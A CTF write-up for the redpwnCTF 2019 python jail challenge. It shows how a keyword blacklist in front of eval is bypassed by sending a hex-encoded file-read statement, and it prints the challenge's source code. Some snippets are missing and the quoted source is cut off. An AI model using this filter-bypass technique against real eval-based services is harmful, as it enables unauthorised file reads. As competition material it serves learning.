Tags: misc python jail 


In this misc challenge with the description:
When has a blacklist of insecure keywords EVER failed?

nc chall2.2019.redpwn.net 6006
we are also given a blacklist of words (look at blacklist.txt) that we can't use in this python shell. Let's try to open a file in the classic way:

wow! there's a file called flag.txt right here!
>>> print(open('flag.txt').read())
That's not allowed here

The blacklist is actually working, let's try to put random things to raise errors:

wow! there's a file called flag.txt right here!
>>> asd
Traceback (most recent call last):
File "jail1.py", line 49, in <module>
data = eval(data)
File "<string>", line 1, in <module>
NameError: name 'asd' is not defined

Here we can see that there is an eval statement, let's assume that the blacklist control is naive as:

for x in blacklist:
if x in readed:
#error handling

we can bypass the check passing the file reading statement encoded in some way, let's try with hexadecimal


in hex become


so we should send


wow! there's a file called flag.txt right here!
>>> "7072696e74286f70656e2827666c61672e74787427292e72656164282929".decode('hex')

P.S: Let's have fun dumping the software used for this challenge using:


The code used for this challenge is:
#!/usr/bin/env python

from __future__ import print_function

print("wow! there's a file called flag.txt right here!")
banned = [
"i love blacklisting words!",
"windows users",
"most of these are in here just to confuse you",
"hah almost forgot that one",
"yah have fun",

while 1:
print(">>>", end=' ')
data = raw_input()
for no in banned:
if str(no).lower() in str(data).lower():
print("That's not allowed here")
else: # this means nobreak
data = eval(data)
if("code" not in str(data)):
data = str(data)

Original writeup (https://github.com/pwnsticciotti/writeups/blob/master/redpwnCTF/genericpyjail/README.md).